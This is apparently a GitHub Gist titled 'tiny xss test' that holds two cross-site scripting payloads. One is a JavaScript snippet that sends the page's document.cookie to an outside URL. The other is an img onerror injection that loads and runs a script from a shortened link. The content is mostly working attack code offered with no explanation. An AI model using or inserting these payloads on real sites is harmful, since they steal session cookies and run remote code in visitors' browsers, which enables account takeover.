Last active
June 16, 2017 14:22
-
-
Save edtoken/3a3d5fec7a959799a743fc3ad195fee8 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if(confirm('HI')){ | |
document.location = "http://google.com?cookie=" + document.cookie | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
tiny xss test
<img src=image.jpg height=1 width=1 onerror=(a=document.createElement('script'),a.type="text/javascript",a.src="https://goo.gl/aptdib",document.head.appendChild(a));>